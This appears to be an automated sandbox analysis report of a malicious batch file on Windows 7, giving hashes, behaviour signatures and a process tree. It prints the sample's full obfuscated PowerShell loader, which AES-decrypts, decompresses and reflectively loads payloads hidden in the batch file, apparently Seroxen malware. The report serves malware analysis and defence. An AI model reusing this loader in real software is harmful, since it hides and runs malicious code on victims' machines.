Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
01-09-2023 16:26
Static task
static1
Behavioral task
behavioral1
Sample
aaaccc_JC.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
aaaccc_JC.bat
Resource
win10v2004-20230831-en
General
-
Target
aaaccc_JC.bat
-
Size
16.0MB
-
MD5
cf6b0959b49f88a949a9ff983ac8aba1
-
SHA1
c86de7221cf3733dec8906718b9f986fadc0c546
-
SHA256
e8fcddca33d734dc65ce4737193e9f2e9598d7d4d42b85dea91b21435d165860
-
SHA512
e7a092304c264a5400171b66d91f9aa0b24d01f7555d6a5c92f537222937883bbe01fb4438792249c4bc3a70d9cba2b4ca2176884528b707d9d08747085418d1
-
SSDEEP
49152:JwEOTlzglY3SQejz3XIi3i1v7IhK/AFx1q9KPN81boBfuGznNXyFXGWSUxxyy8pp:1
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2760 aaaccc_JC.bat.exe -
Loads dropped DLL 1 IoCs
pid Process 1600 cmd.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2760 aaaccc_JC.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2760 aaaccc_JC.bat.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1600 wrote to memory of 2684 1600 cmd.exe 29 PID 1600 wrote to memory of 2684 1600 cmd.exe 29 PID 1600 wrote to memory of 2684 1600 cmd.exe 29 PID 2684 wrote to memory of 1372 2684 net.exe 30 PID 2684 wrote to memory of 1372 2684 net.exe 30 PID 2684 wrote to memory of 1372 2684 net.exe 30 PID 1600 wrote to memory of 2760 1600 cmd.exe 31 PID 1600 wrote to memory of 2760 1600 cmd.exe 31 PID 1600 wrote to memory of 2760 1600 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\aaaccc_JC.bat"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\aaaccc_JC.bat.exe"aaaccc_JC.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fvLmJ($KVhEh){ $oWPLc=[System.Security.Cryptography.Aes]::Create(); $oWPLc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $oWPLc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $oWPLc.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('06baVgQzMgIGNmQWU2ZweJCNfS4C1UnwZz1DO6Fw1eI='); $oWPLc.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('H28mbMv+b6JmoxyAra5Pvg=='); $jfPUj=$oWPLc.CreateDecryptor(); $return_var=$jfPUj.TransformFinalBlock($KVhEh, 0, $KVhEh.Length); $jfPUj.Dispose(); $oWPLc.Dispose(); $return_var;}function kvnss($KVhEh){ $nhogW=New-Object System.IO.MemoryStream(,$KVhEh); $MVRgS=New-Object System.IO.MemoryStream; $jeACs=New-Object System.IO.Compression.GZipStream($nhogW, [IO.Compression.CompressionMode]::Decompress); $jeACs.CopyTo($MVRgS); $jeACs.Dispose(); $nhogW.Dispose(); $MVRgS.Dispose(); $MVRgS.ToArray();}function RvXud($KVhEh,$JNlRT){ $JrKRA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$KVhEh); $gzCqG=$JrKRA.EntryPoint; $gzCqG.Invoke($null, $JNlRT);}$GLTGr=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\aaaccc_JC.bat').Split([Environment]::NewLine);foreach ($rTaqs in $GLTGr) { if ($rTaqs.StartsWith('SEROXEN')) { $PDfah=$rTaqs.Substring(7); break; }}$NEYzm=[string[]]$PDfah.Split('\');$QOnYj=kvnss (fvLmJ ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NEYzm[0])));$wTJIi=kvnss (fvLmJ ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NEYzm[1])));RvXud $wTJIi (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));RvXud $QOnYj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d